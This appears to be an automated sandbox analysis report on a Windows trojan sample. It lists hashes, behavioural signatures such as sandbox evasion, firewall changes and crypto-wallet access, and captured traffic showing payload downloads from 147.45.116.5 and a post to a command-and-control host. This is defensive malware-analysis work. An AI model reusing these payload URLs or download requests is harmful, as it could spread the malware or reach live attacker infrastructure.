Windows Analysis Report
Q0cWJo6Jvh.exe

Overview

General Information

Sample name: Q0cWJo6Jvh.exe
renamed because original name is a hash value
Original sample name: 414753e6caa05ca4a49546cec841ef10.exe
Analysis ID: 1528439
MD5: 414753e6caa05ca4a49546cec841ef10
SHA1: 998c0b4533f3e00eeacf441fbe29575198a574d4
SHA256: 5b9ed73fd7af6b0f9625ff30b925c84905e76b694a37e41d6207626b2fc3d2f6
Tags: 64exetrojan
Infos:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Modifies the windows firewall
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to access browser extension known for cryptocurrency wallets
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 97.1% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\temp333\install_2.dll Code function: 2_2_6D3601F0 BCryptGenRandom,SystemFunction036, 2_2_6D3601F0
Source: ybtrrus.exe, 00000005.00000002.3343611670.000000000545A000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: -----BEGIN RSA PUBLIC KEY----- memstr_41989d32-0
Source: Q0cWJo6Jvh.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: g2m.pdb source: install_2.dll, 00000002.00000002.3341287236.000000006D39D000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: install_2.dll, 00000002.00000003.2491716669.000000000254D000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000005.00000002.3378900514.000000006CAC5000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: install_2.dll, 00000002.00000002.3339175057.0000000000402000.00000002.00000001.01000000.00000004.sdmp, install_2.dll, 00000002.00000000.2124176727.0000000000402000.00000002.00000001.01000000.00000004.sdmp
Source: C:\temp333\install_2.dll Code function: 2_2_6D371F00 CloseHandle,memset,FindFirstFileW,FindClose, 2_2_6D371F00
Source: C:\temp333\install_2.dll Code function: 2_2_6D3716F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError, 2_2_6D3716F0
Source: C:\5p9SnCM5jV\ybtrrus.exe Code function: 5_2_6CAAC2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError, 5_2_6CAAC2D0
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CFB16
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CFA66
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798BDA66
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CF9B6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7798D596D
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbx 0_2_00007FF779899CC9
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798BBCC6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798CFD06
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798BDC76
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbx 0_2_00007FF7798CFBC6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798BDB26
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbx 0_2_00007FF7798BBED6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rax, qword ptr [rcx] 0_2_00007FF779853ED0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798CFF16
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798BBE26
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798CFDC6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798BDD36
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798BBD76
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798BC0C6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r13 0_2_00007FF7798CE110
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r13 0_2_00007FF7798CE110
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbx 0_2_00007FF779830093
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rdx, qword ptr [rdx] 0_2_00007FF7798CFFD6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798BC016
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7798C7F40
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798AB26D
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798C74E0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798C74E0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CF716
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CF666
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r15 0_2_00007FF779859850
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbx 0_2_00007FF7798CF876
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CF7C6
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798AD7FD
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r15 0_2_00007FF779887760
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CAAC0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7798CAAC0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r13 0_2_00007FF7798CEAF0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r13 0_2_00007FF7798CEAF0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then sub rsp, 38h 0_2_00007FF7798CC9C0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then sub rsp, 38h 0_2_00007FF7798C8CA0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798C4C90
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then xor r9d, r9d 0_2_00007FF7798CAD50
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbp 0_2_00007FF77989AD8C
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF77989AF5C
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rbx 0_2_00007FF7798BC226
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798CA260
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then sub rsp, 28h 0_2_00007FF7798CA260
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798BC176
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then xor r9d, r9d 0_2_00007FF7798CA4F0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r14 0_2_00007FF779890430
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rsi 0_2_00007FF7798CC450
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then mov rax, qword ptr [rcx+10h] 0_2_00007FF77984A439
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r15 0_2_00007FF77988C5B0
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push r14 0_2_00007FF77989A5AC
Source: C:\Users\user\Desktop\Q0cWJo6Jvh.exe Code function: 4x nop then push rdi 0_2_00007FF7798B65DA
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 20:41:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 07 Oct 2024 17:29:13 GMTETag: "296a00-623e65c079bb9"Accept-Ranges: bytesContent-Length: 2714112Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 48 4b d1 39 0c 2a bf 6a 0c 2a bf 6a 0c 2a bf 6a 05 52 2c 6a 04 2a bf 6a cf a9 be 6b 0e 2a bf 6a cf a9 bc 6b 0b 2a bf 6a cf a9 bb 6b 06 2a bf 6a cf a9 ba 6b 03 2a bf 6a cb 5f be 6b 1e 2a bf 6a 18 ae bb 6b 06 2a bf 6a 7c ab be 6b 0f 2a bf 6a 0c 2a be 6a 0c 2b bf 6a 0c 2a bf 6a f8 2a bf 6a 18 ae bf 6b 0d 2a bf 6a 18 ae bd 6b 0d 2a bf 6a 52 69 63 68 0c 2a bf 6a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a1 18 04 67 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 28 00 c0 1c 00 00 aa 0c 00 00 00 00 00 fe 53 1c 00 00 10 00 00 00 d0 1c 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 29 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 d1 26 00 78 00 00 00 28 d2 26 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 28 00 0c 35 01 00 08 e1 24 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 e1 24 00 18 00 00 00 48 e0 24 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 1c 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 bf 1c 00 00 10 00 00 00 c0 1c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa 13 0a 00 00 d0 1c 00 00 14 0a 00 00 c4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 5f 01 00 00 f0 26 00 00 5c 01 00 00 d8 26 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 0c 35 01 00 00 50 28 00 00 36 01 00 00 34 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 20:41:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 29 Aug 2024 19:15:37 GMTETag: "9dc0-620d74cbebcf6"Accept-Ranges: bytesContent-Length: 40384Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 45 dc 31 84 01 bd 5f d7 01 bd 5f d7 01 bd 5f d7 08 c5 cc d7 06 bd 5f d7 01 bd 5e d7 08 bd 5f d7 08 c5 db d7 00 bd 5f d7 1f ef cb d7 00 bd 5f d7 08 c5 ce d7 00 bd 5f d7 52 69 63 68 01 bd 5f d7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 e5 a3 50 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 00 00 00 04 00 00 2d e7 00 00 02 00 00 84 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 21 00 00 50 00 00 00 00 50 00 00 10 74 00 00 00 00 00 00 00 00 00 00 00 86 00 00 c0 17 00 00 00 00 00 00 00 00 00 00 30 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 04 00 00 00 10 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ac 02 00 00 00 20 00 00 00 04 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 04 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 04 00 00 00 00 40 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 74 00 00 00 50 00 00 00 76 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1accept: */*host: 147.45.116.5
Source: global traffic HTTP traffic detected: GET /index.php?user-PC HTTP/1.1accept: */*host: 147.45.116.5
Source: global traffic HTTP traffic detected: POST /$rdgate?ACTION=HELLO HTTP/1.1HOST: TGB5F522C40.SERVEGAME.COMCONTENT-LENGTH: 7246Data Raw: 76 c9 dc 1b df 8a 58 32 87 83 fa 8d 9d 8c 18 80 4a cb 4b 17 6b 80 8e 0c 25 a6 a1 39 d3 62 77 20 a0 16 78 d7 50 d7 b2 ca c0 ed 1d 47 88 9f b0 80 81 f8 9d 2e 71 01 1f 7e 3f 36 c7 50 99 84 8a 76 61 8e d5 b6 c3 a9 c6 fd f5 69 e8 53 49 7d 85 44 1a 80 3c f6 06 39 9e 13 f1 c7 df 0e 2d 85 86 bf ef 9f 14 f6 32 f8 52 57 3c 61 62 0a a0 bd 7e f7 5c 4f 99 fe 08 61 1c 98 22 12 0c 81 e3 54 86 d6 e3 c2 db 00 f0 1f 2a 40 a7 04 fb ba b8 21 53 a1 a3 d8 cf 3b ad b6 6a 43 1c 3a 41 ec 95 1d cf 1c 87 d4 36 44 ed a6 11 90 91 ad 3b c6 82 21 37 2d 29 e5 6d 1e e7 8d 99 b1 83 fb 00 06 b8 e1 77 6a 1a bd 18 82 07 59 6b d7 97 11 4b 71 a1 45 99 33 ac 90 c4 77 87 78 dd 3b c2 d6 2f 3a d9 68 0f 24 02 68 38 18 02 13 cf 29 2f 2c fe 8c 39 c8 6d a4 98 cf fb f0 d8 92 21 aa f2 8b f2 cf 2e c4 61 cf 10 7c 91 4d 32 cc 6a 20 df 55 d5 0b 56 47 de dc 08 03 fc b4 8e af 1e a5 34 f3 f5 95 78 65 dd 41 ec 17 0b 02 e0 8a 77 e5 0f f4 96 dd bb 72 0c c3 e9 d6 37 a1 d7 8d 9d 28 97 e8 c7 24 17 30 04 39 f4 2a ac 08 94 43 90 40 55 d5 8d 90 06 35 25 60 9a 29 03 82 04 e3 be 31 17 21 1d d1 a0 41 f4 fb 88 78 49 0c 0d 16 c6 f2 2d f7 42 12 79 5a 85 11 e2 78 39 38 9c 77 6a 03 d1 22 ea fd bf c8 ae dc b7 2a 1c bb e9 c0 a2 16 c0 c2 11 38 68 df 2c 83 82 5f 62 76 d1 9c 8d 81 0e fb bb b6 1c b4 fe 87 75 44 6c a3 24 5f 6a 82 39 fc 9c 1d 53 db d0 5f 91 34 8f 0d 50 e0 3c 38 56 f1 33 48 99 24 62 1b d2 06 86 57 86 71 62 af b3 a8 a9 75 fc 2b 83 85 03 ab 33 fc 05 d5 d1 8e 2e b5 50 32 25 92 02 8c e9 0e c1 15 ac b1 24 94 07 79 76 03 96 a8 ad 7f 1b 3d 9a e7 33 9f 74 5f 88 5e 81 7b a7 6c 39 dd ee f2 a0 26 60 fd 17 cc 32 52 5d 70 e5 eb 42 95 88 66 85 38 bc 77 57 98 19 b9 08 39 8e 15 b6 4c 4f 8c 3a 65 33 99 76 41 e4 76 d8 4d f0 48 84 d9 e4 60 c7 51 2f ff c9 70 46 12 3a a9 94 61 84 12 40 6d 6b 09 b6 d0 f3 c8 22 68 32 bc 3c 67 96 ef c1 ef ed 5b 78 f7 1b e1 3f f5 42 0a a3 c5 4d 00 d0 28 fa 97 9b 12 5c 43 ab 0b 9c 51 04 6b aa 1b e5 63 b8 32 a1 52 1b 24 7e 70 81 10 76 96 f2 f6 14 7b 7f eb 68 53 40 95 2a cf fa c1 ed 64 6c 1a 03 05 a6 d2 8a e4 bd 3f 74 09 43 bb ed cb e5 ef 89 dd 4c 95 25 94 92 bc 1a 58 7e cb 76 b9 c7 a4 eb bb 12 e9 f7 d1 ef 08 aa 98 9e 84 15 1a d7 96 95 ed 5a 4f 9b eb 94 c6 92 16 74 03 21 2b 0a b6 9e 8a 6d 6e 5c ab 73 88 d8 ae c1 af e0 0f 98 7a 1e c5 59 79 0b 67 ce 64 80 35 0e e5 cb b2 06 2b a2 ee e3 dd f1 f2 6d d3 c3 24 b6 85 29 44 16 26 08 86 2b 01 55 56 42 86 d4 b1 9c 34 4d c7 8c 1a 12 05 90 7c a0 81 61 8e 8f 08 a6 71 b7 6f c7 32 b1 2d 90 4a d0 c3 e3 4b f1 4a 55 1b ad 9b 94 47 03 9c ae 36 ba 6d a5 9c 4c 34 cd d4 2d 1e 4c 9a cb 56 e5 ff 80 b7 b7 b6 90 52 92 77 bf 8e 68 3c 51 2a c7 01 d8 f3 f0 c8 2c d0 ed df 33 04 22 7a 71 ac 92 9f 49 bd 06 31 e9 73 22 ef 74 ad 32 6d 6d 8f 9c 90 f1 ea ed c3 53 23 c7 f5 bb 28 42 0a 17 2f 09 84 ec 2b 9c b1 91 f9 3f ed ce 96 87 5b 27 46 31 0c 0d ed 61 e2 f1 ff b0 a3 4e 68 7a 8b 47 71 cd 9d 7a 6e ca 59 97 43 f8 cb 5e 83 06 7d 70 0d 88 49 5b bb a9 1d 25 df 33 82 ec b1 36 3f ea ef 07 26 28 f4
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 213.188.196.246 213.188.196.246
Source: Joe Sandbox View IP Address: 213.188.196.246 213.188.196.246
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /api/timezone/America/Sao_Paulo HTTP/1.1Connection: closeHost: worldtimeapi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global traffic HTTP traffic detected: GET /api/timezone/America/Sao_Paulo HTTP/1.1Connection: closeHost: worldtimeapi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: C:\temp333\install_2.dll Code function: 2_2_6D369F50 recv,WSAGetLastError, 2_2_6D369F50
Source: global traffic HTTP traffic detected: GET /FANTASMA/g2m.dll HTTP/1.1Connection: Keep-AliveUser-Agent: DownloadBinary/1.0Host: 147.45.116.5
Source: global traffic HTTP traffic detected: GET /FANTASMA/install_2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: DownloadBinary/1.0Host: 147.45.116.5
Source: global traffic HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1accept: */*host: 147.45.116.5
Source: global traffic HTTP traffic detected: GET /index.php?user-PC HTTP/1.1accept: */*host: 147.45.116.5
Source: global traffic HTTP traffic detected: GET /api/timezone/America/Sao_Paulo HTTP/1.1Connection: closeHost: worldtimeapi.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
